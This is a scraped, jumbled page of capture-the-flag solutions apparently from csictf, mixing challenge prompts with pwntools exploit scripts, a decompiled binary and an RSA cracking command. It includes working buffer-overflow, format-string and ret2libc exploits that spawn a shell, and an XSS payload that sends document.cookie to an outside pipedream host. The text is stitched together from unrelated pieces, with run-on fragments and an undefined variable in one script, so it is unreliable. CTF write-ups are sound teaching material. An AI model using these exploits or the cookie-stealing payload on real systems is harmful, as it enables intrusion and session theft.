Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
The original photographer of this picture commented the flag on his post. Find the flag.
Hoshimaseok is up to no good. Track him down.
API_KEY = randomapi
FLAG = csictf{sc4r3d_0f_c0mm1tm3nt}My nephew is a fussy eater and is only willing to eat chocolate oreo. Any other flavour and he throws a tantrum.
A reporter wanted to know where this flight is headed. Where does he (the reporter) live?
These 3 guys encrypted my flag, but they didn't tell me how to decrypt it.
n = 408579146706567976063586763758203051093687666875502812646277701560732347095463873824829467529879836457478436098685606552992513164224712398195503564207485938278827523972139196070431397049700119503436522251010430918143933255323117421712000644324381094600257291929523792609421325002527067471808992410166917641057703562860663026873111322556414272297111644069436801401012920448661637616392792337964865050210799542881102709109912849797010633838067759525247734892916438373776477679080154595973530904808231
e = 65537
c = 226582271940094442087193050781730854272200420106419489092394544365159707306164351084355362938310978502945875712496307487367548451311593283589317511213656234433015906518135430048027246548193062845961541375898496150123721180020417232872212026782286711541777491477220762823620612241593367070405349675337889270277102235298455763273194540359004938828819546420083966793260159983751717798236019327334525608143172073795095665271013295322241504491351162010517033995871502259721412160906176911277416194406909./RsaCtfTool.py -n 408579146706567976063586763758203051093687666875502812646277701560732347095463873824829467529879836457478436098685606552992513164224712398195503564207485938278827523972139196070431397049700119503436522251010430918143933255323117421712000644324381094600257291929523792609421325002527067471808992410166917641057703562860663026873111322556414272297111644069436801401012920448661637616392792337964865050210799542881102709109912849797010633838067759525247734892916438373776477679080154595973530904808231 -e 65537 --uncipher 226582271940094442087193050781730854272200420106419489092394544365159707306164351084355362938310978502945875712496307487367548451311593283589317511213656234433015906518135430048027246548193062845961541375898496150123721180020417232872212026782286711541777491477220762823620612241593367070405349675337889270277102235298455763273194540359004938828819546420083966793260159983751717798236019327334525608143172073795095665271013295322241504491351162010517033995871502259721412160906176911277416194406909}<</style>>`;<<img src=x onerror=document.location="https://ennfyqj04serj.x.pipedream.net/?c="+document.cookie;>>file blaiseRotor 2 = I
Rotor 3 = IV
Rotor 4 = VIIblaise: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=00fb13e98a303dff4159e894942e363208415ba1, for GNU/Linux 3.2.0, not stripped$ ./blaise
15$ ./blaise
19
12
24
a
$def f(num):
ret = 1
counter = 2
while counter <= num:
ret *= counter
counter += 1
return ret
def c(ran, counter):
num1 = f(ran)
num2 = f(counter)
num3 = f(ran - counter)
return num1 / (num2 * num3)from pwn import *
from sys import argv
if argv[1] == "r":
p = remote("chall.csivit.com", 30808)
else:
e = ELF("./blaise")
p = e.process()
rand = int(p.recvline()) # Recieves random number
log.info(f"random number: {rand}")
def f(num):
ret = 1
counter = 2
while counter <= num:
ret *= counter
counter += 1
return ret
def c(ran, counter):
num1 = f(ran)
num2 = f(counter)
num3 = f(ran - counter)
return num1 / (num2 * num3)
for i in range(0, rand + 1):
data = int(c(rand, i)) # Gets required number
p.sendline(str(data)) # Sends
flag = p.clean()
if flag: # I was lazy :p
log.info(f"flag is: {flag.decode()}")
exit()from pwn import *
elf = ELF('./vuln')
p = remote("chall.csivit.com", 30023)
admin = elf.symbols['admin']
value = 0xb4dbabe3 # this is the needed admin value
payload = fmtstr_payload(12, {admin : value})
p.sendline(payload)
print(p.clean().decode())I love this watch. It's been with me all over the world, from Istanbul to Shanghai
to Macau. I wear it with suits quite a lot. My boss liked it too. I remember
wearing it when she died. What is her successor's name?from pwn import *
elf = ELF('./vuln')
p = remote('chall.csivit.com', 30013)
payload = b'A' * 40
payload += p64(elf.symbols['flag'])
p.clean()
p.sendline(payload)
print(p.clean(2).decode())from pwn import *
p = remote('chall.csivit.com', 30007)
payload = b'A' * 44
payload += p32(0xcafebabe)
p.sendline(payload)
print(p.clean().decode())
int main(void)
{
int random;
time_t tVar1;
long result;
long input;
time_t local_40;
time_t local_38;
time_t local_30;
long number2;
long number1;
char *time_to_execute;
int counter;
int check;
setbuf(stdin,(char *)0x0);
setbuf(stdout,(char *)0x0);
setbuf(stderr,(char *)0x0);
tVar1 = time(&local_30);
srand((uint)tVar1);
time(&local_38);
check = 1;
counter = 0;
while( true ) {
random = rand();
if (random % 3 + 4 < counter) break;
random = rand();
number1 = (long)(random % 10 + 6);
random = rand();
number2 = (long)(random % 10 + 6);
printf("%d %d\n",number1,number2);
__isoc99_scanf(&DAT_0040200f,&input);
result = function1(number1,number2);
result = function2(result + 3);
if (result != input) {
check = 0;
}
counter = counter + 1;
}
time(&local_40);
time_to_execute = (char *)(double)(local_40 - local_38);
printf(time_to_execute,"fun() took %f seconds to execute \n");
if ((check != 1) || (30.00000000 < (double)time_to_execute)) {
printf("Nahh.");
}
else {
puts("Hey, you got me!");
system("cat flag.txt");
}
return 0;
}number1 = (long) (random % 10 + 6);
random = rand();
number2 = (long) (random % 10 + 6);
printf("%d %d\n", number1, number2);
__isoc99_scanf(&DAT_0040200f, &input);
result = function1(number1, number2);
result = function2(result + 3);
if (result != input) {
check = 0;
}if ((check != 1) || (30.00000000 < (double)time_to_execute)) {
printf("Nahh.");
}
else {
puts("Hey, you got me!");
system("cat flag.txt");
}long function1(long num1,long num2)
{
int counter;
int answer;
answer = 0;
counter = 1;
while ((counter <= num1 || (counter <= num2))) {
if ((num1 % (long) counter == 0) && (num2 % (long) counter == 0)) {
answer = counter;
}
counter = counter + 1;
}
return (long)answer;
}long function2(long number)
{
long lVar1;
if (number == 0) {
lVar1 = 1;
}
else {
lVar1 = function2(number - 1);
lVar1 = lVar1 * number;
}
return lVar1;
}def function2(number):
if number == 0:
return 1
return number * function(number - 1)two numbers -> highest common factor -> +3 -> factorial -> compared to inputfrom pwn import *
from numpy import gcd
import numpy
p = remote('chall.csivit.com', 30827)
while True:
try:
num1, num2 = map(int, p.recvline().decode().split()) # Cast and assign the two numbers
log.info(f'{num1} {num2}')
hcf = gcd(num1, num2)
log.success(f'HCF of {num1} and {num2} is {hcf}')
fact = numpy.math.factorial(hcf + 3)
log.success(f'Factorial of {hcf + 3}: {fact}')
p.sendline(f'{fact}')
except ValueError:
# If it's ValueError it can't be cast to an int, so we've received the flag
break
print(p.clean(1).decode())








from pwn import *
elf = context.binary = ELF('./hello')
# Adapt for remote
if args.REMOTE:
libc = ELF('./libc-remote.so')
p = remote('chall.csivit.com', 30046)
else:
libc = elf.libc
p = elf.process()
# ret2plt
p.clean(1)
payload = flat(
b'A' * 136,
elf.plt['puts'],
elf.symbols['main'], # 32-bit - return address comes directly after the function call
elf.got['puts'] # Parameter comes after the return address
)
p.sendline(payload)
p.recvline() # This is the 'Hello, <>!' string - we don't need this
puts_libc = u32(p.recv(4)) # The puts call. We only need the first 4 bytes (the GOT entry of puts)
log.success(f'Puts@LIBC: {hex(puts_libc)}')
libc.address = puts_leak - libc.symbols['puts']
log.success(f'Libc base: {hex(libc.address)}')
p.clean(1)
# Final ret2libc
payload = flat(
b'A' * 136,
libc.symbols['system'],
libc.symbols['exit'],
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()"People who get violent get that way because they can’t communicate."
# Hey there, you're not a robot, yet I see you sniffing through this file.
# SEO you later!
# Now get off my lawn.
Disallow: /fade/to/black




Wanna enter the Secret Society? Well you have to find the secret code first!





from pwn import *
p = remote('chall.csivit.com', 30001)
p.sendline('A' * 200)
print(p.clean().decode())


